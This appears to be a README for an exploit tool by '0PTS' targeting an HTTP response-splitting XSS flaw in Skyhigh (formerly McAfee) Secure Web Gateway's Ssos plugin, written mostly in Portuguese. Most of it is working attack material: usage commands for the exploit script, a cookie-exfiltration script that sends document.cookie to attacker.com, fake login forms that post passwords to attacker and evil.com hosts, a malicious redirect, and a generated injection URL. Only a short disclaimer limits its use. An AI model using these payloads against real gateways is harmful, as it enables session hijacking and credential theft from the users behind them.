
Secure Web Gateway 10.2.11 - Scripting entre Sites (XSS)
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
by 0PTS
Prova de conceito para a vulnerabilidade HTTP Response Splitting no Skyhigh Secure Web Gateway (anteriormente McAfee Web Gateway).
Vulnerabilidade crítica de HTTP Response Splitting no Skyhigh Secure Web Gateway, permitindo execução remota de ataques XSS através da injeção de código HTML/JavaScript arbitrário.
A vulnerabilidade está no plugin "Ssos" (ação SetLoginToken), que processa incorretamente os parâmetros de URL:
Como os caracteres de nova linha (\r\n / %0d%0a) não são escapados, o atacante pode:
Content-Type e Content-LengthO navegador ignora o restante do conteúdo da resposta após um Content-Length corretamente definido, permitindo substituir completamente o conteúdo exibido.
python explot.py
# Базовый XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"
# Редирект
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'
# Фишинг форма
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'
# Только URL (тихий режим)
python explot.py -d example.com -p "<script>alert(1)</script>" -q
-d, --domain Domínio alvo (padrão: google.com)
-x, --prefix Prefixo do caminho da URL (padrão: SWG internal path)
-p, --payload HTML/JavaScript payload
-q, --quiet Modo silencioso - apenas URL
-v, --version Versão do script
-h, --help Ajuda
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
[+] Target Domain: example.com
[+] Payload Length: 43 bytes
[+] URL Length: 234 chars
[+] Generated URL:
http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mwg-internal/*⚠️ ATENÇÃO: Esta ferramenta é destinada exclusivamente para:
O uso contra sistemas sem permissão explícita do proprietário é ilegal.
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝